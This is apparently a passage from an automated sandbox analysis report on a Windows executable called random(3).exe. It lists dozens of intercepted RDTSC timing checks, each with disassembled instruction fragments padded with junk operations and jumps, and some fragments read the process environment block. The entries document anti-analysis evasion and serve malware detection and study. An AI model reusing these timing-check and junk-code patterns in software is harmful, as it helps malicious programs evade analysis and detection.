    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 160B4B0 second address: 160B4BA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F29FC4F369Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 160D591 second address: 160D597 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 160D2D3 second address: 160D2E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC4F36A2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 16DAA4F second address: 16DAA65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518EA0h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 16DAA65 second address: 16DAA6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 16DAA6D second address: 16DAA71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 16DAA71 second address: 16DAA7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 16DAA7E second address: 16DAA83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 16DABBC second address: 16DABC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 16DABC4 second address: 16DABCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 16DAD78 second address: 16DAD7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 16DAD7C second address: 16DAD94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518EA4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 16DAD94 second address: 16DAD9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 16DB029 second address: 16DB047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F29FC518E96h 0x0000000a pop ecx 0x0000000b push ecx 0x0000000c jc 00007F29FC518E96h 0x00000012 jng 00007F29FC518E96h 0x00000018 pop ecx 0x00000019 pop edi 0x0000001a push ebx 0x0000001b push esi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 16DB316 second address: 16DB31A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 16DB31A second address: 16DB336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F29FC518EA6h 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 16DE5D8 second address: 16DE5DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 16DE5DC second address: 16DE5E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 16DFC69 second address: 16DFC6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 16DFC6D second address: 16DFC8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518E9Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jg 00007F29FC518E96h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 16E196B second address: 16E199A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jo 00007F29FC4F3696h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jno 00007F29FC4F3698h 0x00000013 jg 00007F29FC4F3698h 0x00000019 jp 00007F29FC4F369Ch 0x0000001f push eax 0x00000020 push edx 0x00000021 push edx 0x00000022 pop edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 16E199A second address: 16E199E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 16E199E second address: 16E19A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F001B second address: 79F002D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 mov bh, ah 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F002D second address: 79F0031 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0031 second address: 79F0037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0037 second address: 79F0079 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC4F369Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d jmp 00007F29FC4F369Eh 0x00000012 mov ch, D6h 0x00000014 popad 0x00000015 mov ebp, esp 0x00000017 jmp 00007F29FC4F369Dh 0x0000001c mov eax, dword ptr fs:[00000030h] 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 mov bx, 628Eh 0x00000029 popad 0x0000002a rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0079 second address: 79F00BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518E9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 18h 0x0000000c jmp 00007F29FC518EA6h 0x00000011 xchg eax, ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F29FC518EA7h 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F00BB second address: 79F00D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29FC4F36A4h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F00D3 second address: 79F00D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F00D7 second address: 79F00F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov bx, cx 0x0000000d mov ebx, eax 0x0000000f popad 0x00000010 xchg eax, ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 movsx edi, ax 0x00000017 mov ecx, 4FF6DB3Fh 0x0000001c popad 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F00F4 second address: 79F014F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518EA5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [eax+10h] 0x0000000c pushad 0x0000000d push ecx 0x0000000e mov edi, 0A5680BEh 0x00000013 pop edi 0x00000014 jmp 00007F29FC518EA4h 0x00000019 popad 0x0000001a xchg eax, esi 0x0000001b jmp 00007F29FC518EA0h 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F29FC518E9Eh 0x00000028 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F014F second address: 79F0170 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ecx, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F29FC4F36A4h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0170 second address: 79F0182 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29FC518E9Eh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0182 second address: 79F01B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC4F369Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [772406ECh] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F29FC4F36A5h 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F01B0 second address: 79F0215 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518EA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F29FC518E9Ch 0x00000012 sub si, FB38h 0x00000017 jmp 00007F29FC518E9Bh 0x0000001c popfd 0x0000001d push eax 0x0000001e push edx 0x0000001f pushfd 0x00000020 jmp 00007F29FC518EA6h 0x00000025 jmp 00007F29FC518EA5h 0x0000002a popfd 0x0000002b rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0215 second address: 79F0245 instructions: 0x00000000 rdtsc 0x00000002 mov edi, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jne 00007F29FC4F44A9h 0x0000000d pushad 0x0000000e mov ebx, esi 0x00000010 jmp 00007F29FC4F36A4h 0x00000015 popad 0x00000016 xchg eax, edi 0x00000017 pushad 0x00000018 movzx eax, dx 0x0000001b push eax 0x0000001c push edx 0x0000001d mov di, 936Ch 0x00000021 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0245 second address: 79F028E instructions: 0x00000000 rdtsc 0x00000002 call 00007F29FC518EA5h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F29FC518E9Eh 0x00000011 xchg eax, edi 0x00000012 jmp 00007F29FC518EA0h 0x00000017 call dword ptr [77210B60h] 0x0000001d mov eax, 766BE5E0h 0x00000022 ret 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 mov bl, 70h 0x00000028 push ecx 0x00000029 pop ebx 0x0000002a popad 0x0000002b rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F028E second address: 79F0294 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0294 second address: 79F0298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0298 second address: 79F02C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC4F369Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 00000044h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F29FC4F36A3h 0x00000015 mov cx, 08AFh 0x00000019 popad 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F02C8 second address: 79F0335 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F29FC518E9Bh 0x00000009 add eax, 6E7F613Eh 0x0000000f jmp 00007F29FC518EA9h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F29FC518EA0h 0x0000001b adc ecx, 2A030E38h 0x00000021 jmp 00007F29FC518E9Bh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a pop edi 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F29FC518EA5h 0x00000032 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0335 second address: 79F0345 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29FC4F369Ch 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0345 second address: 79F037E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518E9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c jmp 00007F29FC518EA6h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F29FC518E9Eh 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F037E second address: 79F03D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F29FC4F36A1h 0x00000009 add eax, 18DBFA46h 0x0000000f jmp 00007F29FC4F36A1h 0x00000014 popfd 0x00000015 jmp 00007F29FC4F36A0h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, edi 0x0000001e jmp 00007F29FC4F36A0h 0x00000023 push dword ptr [eax] 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushad 0x00000029 popad 0x0000002a mov dh, B6h 0x0000002c popad 0x0000002d rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F03D9 second address: 79F0407 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518EA5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000030h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F29FC518E9Dh 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0407 second address: 79F041C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 mov bx, 4C3Eh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push dword ptr [eax+18h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F041C second address: 79F042A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518E9Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0461 second address: 79F04B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, eax 0x0000000a pushad 0x0000000b jmp 00007F29FC4F36A8h 0x00000010 mov cx, 0AD1h 0x00000014 popad 0x00000015 test esi, esi 0x00000017 jmp 00007F29FC4F369Ch 0x0000001c je 00007F2A6BCC28A7h 0x00000022 jmp 00007F29FC4F36A0h 0x00000027 sub eax, eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F04B5 second address: 79F04B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F04B9 second address: 79F04BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F04BD second address: 79F04C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F04C3 second address: 79F0522 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC4F36A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi], edi 0x0000000b jmp 00007F29FC4F369Eh 0x00000010 mov dword ptr [esi+04h], eax 0x00000013 jmp 00007F29FC4F36A0h 0x00000018 mov dword ptr [esi+08h], eax 0x0000001b pushad 0x0000001c mov cl, 6Dh 0x0000001e jmp 00007F29FC4F36A3h 0x00000023 popad 0x00000024 mov dword ptr [esi+0Ch], eax 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0522 second address: 79F0528 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F067A second address: 79F0703 instructions: 0x00000000 rdtsc 0x00000002 call 00007F29FC4F36A9h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F29FC4F36A7h 0x00000011 sub ax, 3CFEh 0x00000016 jmp 00007F29FC4F36A9h 0x0000001b popfd 0x0000001c mov ah, 55h 0x0000001e popad 0x0000001f popad 0x00000020 mov dword ptr [esi+28h], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F29FC4F36A4h 0x0000002c xor cl, 00000028h 0x0000002f jmp 00007F29FC4F369Bh 0x00000034 popfd 0x00000035 mov ax, 301Fh 0x00000039 popad 0x0000003a rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0703 second address: 79F0709 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 7980697 second address: 79806E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518EA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov di, si 0x00000010 pushfd 0x00000011 jmp 00007F29FC518EA6h 0x00000016 jmp 00007F29FC518EA5h 0x0000001b popfd 0x0000001c popad 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79806E1 second address: 79806F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29FC4F369Ch 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79806F1 second address: 7980753 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F29FC518EA7h 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F29FC518EA4h 0x00000017 sub ah, FFFFFFB8h 0x0000001a jmp 00007F29FC518E9Bh 0x0000001f popfd 0x00000020 pushad 0x00000021 mov al, EFh 0x00000023 push ebx 0x00000024 pop ecx 0x00000025 popad 0x00000026 popad 0x00000027 pop ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F29FC518E9Fh 0x00000031 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 7980753 second address: 7980759 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 7980C79 second address: 7980C7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 7980C7D second address: 7980C90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC4F369Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 7980C90 second address: 7980CA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29FC518EA4h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 7980CA8 second address: 7980CAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79D0A32 second address: 79D0A6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 mov dh, B1h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d movsx ebx, ax 0x00000010 mov eax, 2F4040BBh 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 pushad 0x00000018 mov dh, al 0x0000001a mov bh, D7h 0x0000001c popad 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F29FC518EA7h 0x00000026 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79A0C6B second address: 79A0C94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC4F36A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F29FC4F369Bh 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79A0C94 second address: 79A0C98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79A0C98 second address: 79A0CB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC4F36A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79A0CB3 second address: 79A0CB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79A0CB9 second address: 79A0CBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79A0CBD second address: 79A0CD5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov cx, C3AFh 0x0000000f popad 0x00000010 and esp, FFFFFFF0h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79A0CD5 second address: 79A0CDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79A0CDC second address: 79A0CE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79A0CE2 second address: 79A0D5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 44h 0x0000000b jmp 00007F29FC4F369Ch 0x00000010 xchg eax, ebx 0x00000011 jmp 00007F29FC4F36A0h 0x00000016 push eax 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F29FC4F369Dh 0x0000001e xor eax, 71E47526h 0x00000024 jmp 00007F29FC4F36A1h 0x00000029 popfd 0x0000002a popad 0x0000002b xchg eax, ebx 0x0000002c jmp 00007F29FC4F369Eh 0x00000031 xchg eax, esi 0x00000032 jmp 00007F29FC4F36A0h 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b mov bx, cx 0x0000003e mov edi, esi 0x00000040 popad 0x00000041 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79A0D5D second address: 79A0DAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518EA5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F29FC518E9Eh 0x0000000f xchg eax, edi 0x00000010 pushad 0x00000011 mov ebx, eax 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 movzx esi, di 0x00000019 popad 0x0000001a popad 0x0000001b push eax 0x0000001c pushad 0x0000001d mov eax, 367150CDh 0x00000022 movzx ecx, dx 0x00000025 popad 0x00000026 xchg eax, edi 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F29FC518EA0h 0x0000002e rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79A0DAF second address: 79A0E4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC4F369Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F29FC4F36A4h 0x00000013 sub ecx, 14DC0B78h 0x00000019 jmp 00007F29FC4F369Bh 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007F29FC4F36A8h 0x00000025 jmp 00007F29FC4F36A5h 0x0000002a popfd 0x0000002b popad 0x0000002c mov dword ptr [esp+24h], 00000000h 0x00000034 jmp 00007F29FC4F369Eh 0x00000039 lock bts dword ptr [edi], 00000000h 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F29FC4F36A7h 0x00000045 rdtsc
